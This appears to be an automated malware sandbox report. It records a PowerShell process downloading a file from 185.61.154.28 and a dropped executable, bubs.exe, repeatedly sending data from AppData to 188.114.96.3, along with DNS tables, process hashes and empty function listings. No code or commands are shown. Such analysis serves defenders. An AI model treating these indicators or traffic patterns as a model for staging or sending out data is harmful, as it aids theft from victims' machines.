Nov 20, 2024 12:39:06.935636997 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:06.935738087 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.898395061 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.898569107 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.898641109 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.898659945 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.898744106 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.898789883 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.898808002 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.898895025 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.898940086 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.898955107 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.899068117 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.899153948 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.899167061 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.899173021 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.899218082 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.899240971 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.899410009 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.899482012 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.899488926 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.946106911 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.990540981 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.990639925 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.990690947 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.990706921 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.990820885 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.990878105 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.990964890 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.990982056 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:07.991003036 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:07.991019964 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:08.093079090 CET | 49797 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:08.093143940 CET | 443 | 49797 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:08.093219042 CET | 49797 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:08.093624115 CET | 49797 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:08.093641996 CET | 443 | 49797 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:08.559597969 CET | 443 | 49797 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:08.559667110 CET | 49797 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:08.560988903 CET | 49797 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:08.561006069 CET | 443 | 49797 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:08.561342001 CET | 443 | 49797 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:08.562992096 CET | 49797 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:08.563215971 CET | 49797 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:08.563250065 CET | 443 | 49797 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.081513882 CET | 443 | 49797 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.081659079 CET | 443 | 49797 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.081768990 CET | 49797 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.081948996 CET | 49797 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.081970930 CET | 443 | 49797 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.321351051 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.321408033 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.321585894 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.321939945 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.321959972 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.791143894 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.791218042 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.792644978 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.792660952 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.792998075 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.794282913 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.794459105 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.794486046 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:09.794542074 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:09.794549942 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:10.403269053 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:10.403400898 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:10.403450966 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:10.403680086 CET | 49805 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:10.403698921 CET | 443 | 49805 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:10.641340971 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:10.641393900 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:10.641480923 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:10.641901016 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:10.641916990 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:11.111094952 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:11.111268997 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:11.114537001 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:11.114572048 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:11.114905119 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:11.125438929 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:11.125499010 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:11.125544071 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:11.125684977 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:11.125699043 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:11.654978991 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:11.655075073 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:11.655158997 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:11.655366898 CET | 49816 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:11.655385017 CET | 443 | 49816 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:12.921000004 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:12.921046972 CET | 443 | 49833 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:12.921399117 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:12.921614885 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:12.921626091 CET | 443 | 49833 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:13.386775017 CET | 443 | 49833 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:13.386872053 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:13.388952971 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:13.388967037 CET | 443 | 49833 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:13.389242887 CET | 443 | 49833 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:13.391309977 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:13.391309977 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:13.391347885 CET | 443 | 49833 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:13.771500111 CET | 443 | 49833 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:13.771699905 CET | 443 | 49833 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:13.772383928 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:13.772383928 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.086733103 CET | 49833 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.086777925 CET | 443 | 49833 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.338032961 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.338078976 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.338155031 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.338668108 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.338689089 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.805624008 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.805694103 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.806912899 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.806932926 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.807198048 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.808840036 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.809351921 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.809391975 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.809525013 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.809554100 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.809743881 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.809772015 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.809905052 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.809926033 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.810291052 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.810312986 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:14.810419083 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:14.810431957 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:15.844116926 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:15.844211102 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:15.844265938 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:15.847527981 CET | 49844 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:15.847548008 CET | 443 | 49844 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:15.961756945 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:15.961798906 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:15.961872101 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:15.962320089 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:15.962336063 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:16.450429916 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:16.450505972 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:16.451946974 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:16.451967001 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:16.452249050 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:16.453424931 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:16.453447104 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:16.453500032 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:16.839658976 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:16.839747906 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:16.839855909 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:16.840126038 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:16.840133905 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:16.840146065 CET | 49855 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:16.840150118 CET | 443 | 49855 | 188.114.96.3 | 192.168.2.6 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 12:38:56.277467012 CET | 62286 | 53 | 192.168.2.6 | 1.1.1.1 |
Nov 20, 2024 12:38:56.310900927 CET | 53 | 62286 | 1.1.1.1 | 192.168.2.6 |
Nov 20, 2024 12:39:02.005088091 CET | 62485 | 53 | 192.168.2.6 | 1.1.1.1 |
Nov 20, 2024 12:39:02.014887094 CET | 53 | 62485 | 1.1.1.1 | 192.168.2.6 |
Nov 20, 2024 12:39:04.740314007 CET | 61829 | 53 | 192.168.2.6 | 1.1.1.1 |
Nov 20, 2024 12:39:04.810875893 CET | 53 | 61829 | 1.1.1.1 | 192.168.2.6 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 20, 2024 12:38:56.277467012 CET | 192.168.2.6 | 1.1.1.1 | 0x461 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 12:39:02.005088091 CET | 192.168.2.6 | 1.1.1.1 | 0xebed | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 12:39:04.740314007 CET | 192.168.2.6 | 1.1.1.1 | 0x9fac | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 20, 2024 12:38:56.310900927 CET | 1.1.1.1 | 192.168.2.6 | 0x461 | No error (0) | 185.61.154.28 | A (IP address) | IN (0x0001) | false | ||
Nov 20, 2024 12:39:02.014887094 CET | 1.1.1.1 | 192.168.2.6 | 0xebed | No error (0) | 172.67.167.249 | A (IP address) | IN (0x0001) | false | ||
Nov 20, 2024 12:39:02.014887094 CET | 1.1.1.1 | 192.168.2.6 | 0xebed | No error (0) | 104.21.82.93 | A (IP address) | IN (0x0001) | false | ||
Nov 20, 2024 12:39:04.810875893 CET | 1.1.1.1 | 192.168.2.6 | 0x9fac | No error (0) | 188.114.96.3 | A (IP address) | IN (0x0001) | false | ||
Nov 20, 2024 12:39:04.810875893 CET | 1.1.1.1 | 192.168.2.6 | 0x9fac | No error (0) | 188.114.97.3 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.6 | 49721 | 185.61.154.28 | 443 | 2664 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:38:56 UTC | 181 | OUT | |
2024-11-20 11:38:57 UTC | 281 | IN | |
2024-11-20 11:38:57 UTC | 16384 | IN | |
2024-11-20 11:38:57 UTC | 6016 | IN | |
2024-11-20 11:38:57 UTC | 2176 | IN | |
2024-11-20 11:38:57 UTC | 16384 | IN | |
2024-11-20 11:38:57 UTC | 16384 | IN | |
2024-11-20 11:38:57 UTC | 16384 | IN | |
2024-11-20 11:38:57 UTC | 16331 | IN | |
2024-11-20 11:38:57 UTC | 53 | IN | |
2024-11-20 11:38:57 UTC | 16384 | IN | |
2024-11-20 11:38:57 UTC | 16384 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.6 | 49756 | 172.67.167.249 | 443 | 2664 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:39:02 UTC | 162 | OUT | |
2024-11-20 11:39:03 UTC | 1333 | IN | |
2024-11-20 11:39:03 UTC | 36 | IN | |
2024-11-20 11:39:03 UTC | 86 | IN | |
2024-11-20 11:39:03 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.6 | 49774 | 188.114.96.3 | 443 | 4140 | C:\Users\user\AppData\Roaming\Extra\bubs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:39:05 UTC | 262 | OUT | |
2024-11-20 11:39:05 UTC | 8 | OUT | |
2024-11-20 11:39:06 UTC | 986 | IN | |
2024-11-20 11:39:06 UTC | 7 | IN | |
2024-11-20 11:39:06 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.6 | 49785 | 188.114.96.3 | 443 | 4140 | C:\Users\user\AppData\Roaming\Extra\bubs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:39:06 UTC | 263 | OUT | |
2024-11-20 11:39:06 UTC | 52 | OUT | |
2024-11-20 11:39:07 UTC | 987 | IN | |
2024-11-20 11:39:07 UTC | 382 | IN | |
2024-11-20 11:39:07 UTC | 1369 | IN | |
2024-11-20 11:39:07 UTC | 1369 | IN | |
2024-11-20 11:39:07 UTC | 1369 | IN | |
2024-11-20 11:39:07 UTC | 1369 | IN | |
2024-11-20 11:39:07 UTC | 1369 | IN | |
2024-11-20 11:39:07 UTC | 344 | IN | |
2024-11-20 11:39:07 UTC | 1369 | IN | |
2024-11-20 11:39:07 UTC | 1369 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.6 | 49797 | 188.114.96.3 | 443 | 4140 | C:\Users\user\AppData\Roaming\Extra\bubs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:39:08 UTC | 276 | OUT | |
2024-11-20 11:39:08 UTC | 12834 | OUT | |
2024-11-20 11:39:09 UTC | 985 | IN | |
2024-11-20 11:39:09 UTC | 19 | IN | |
2024-11-20 11:39:09 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.6 | 49805 | 188.114.96.3 | 443 | 4140 | C:\Users\user\AppData\Roaming\Extra\bubs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:39:09 UTC | 282 | OUT | |
2024-11-20 11:39:09 UTC | 15116 | OUT | |
2024-11-20 11:39:10 UTC | 989 | IN | |
2024-11-20 11:39:10 UTC | 19 | IN | |
2024-11-20 11:39:10 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.6 | 49816 | 188.114.96.3 | 443 | 4140 | C:\Users\user\AppData\Roaming\Extra\bubs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:39:11 UTC | 275 | OUT | |
2024-11-20 11:39:11 UTC | 15331 | OUT | |
2024-11-20 11:39:11 UTC | 4601 | OUT | |
2024-11-20 11:39:11 UTC | 992 | IN | |
2024-11-20 11:39:11 UTC | 19 | IN | |
2024-11-20 11:39:11 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.6 | 49833 | 188.114.96.3 | 443 | 4140 | C:\Users\user\AppData\Roaming\Extra\bubs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:39:13 UTC | 278 | OUT | |
2024-11-20 11:39:13 UTC | 1234 | OUT | |
2024-11-20 11:39:13 UTC | 983 | IN | |
2024-11-20 11:39:13 UTC | 19 | IN | |
2024-11-20 11:39:13 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.6 | 49844 | 188.114.96.3 | 443 | 4140 | C:\Users\user\AppData\Roaming\Extra\bubs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:39:14 UTC | 282 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:14 UTC | 15331 | OUT | |
2024-11-20 11:39:15 UTC | 987 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.6 | 49855 | 188.114.96.3 | 443 | 4140 | C:\Users\user\AppData\Roaming\Extra\bubs.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-11-20 11:39:16 UTC | 263 | OUT | |
2024-11-20 11:39:16 UTC | 87 | OUT | |
2024-11-20 11:39:16 UTC | 984 | IN | |
2024-11-20 11:39:16 UTC | 54 | IN | |
2024-11-20 11:39:16 UTC | 5 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 1 |
Start time: | 06:38:50 |
Start date: | 20/11/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6e3d50000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 2 |
Start time: | 06:38:50 |
Start date: | 20/11/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff66e660000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 06:39:03 |
Start date: | 20/11/2024 |
Path: | C:\Users\user\AppData\Roaming\Extra\bubs.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x2d0000 |
File size: | 4'772'864 bytes |
MD5 hash: | 442D526A26805C47376D7B4F78374A4F |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Antivirus matches: |
|
Reputation: | low |
Has exited: | true |
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CB248 Relevance: .6, Instructions: 614COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CD92F Relevance: .3, Instructions: 289COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CC15D Relevance: .3, Instructions: 265COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CD65E Relevance: .2, Instructions: 234COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CB7D8 Relevance: .2, Instructions: 200COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CFB00 Relevance: .2, Instructions: 175COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CB038 Relevance: .2, Instructions: 164COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CB790 Relevance: .2, Instructions: 156COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CF0F5 Relevance: .1, Instructions: 148COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CB718 Relevance: .1, Instructions: 118COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CF179 Relevance: .1, Instructions: 115COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CB020 Relevance: .1, Instructions: 114COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CE621 Relevance: .1, Instructions: 85COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CFAE1 Relevance: .1, Instructions: 73COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CB392 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CB3A6 Relevance: .1, Instructions: 70COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CB3B7 Relevance: .1, Instructions: 69COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD348CFC42 Relevance: .1, Instructions: 67COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
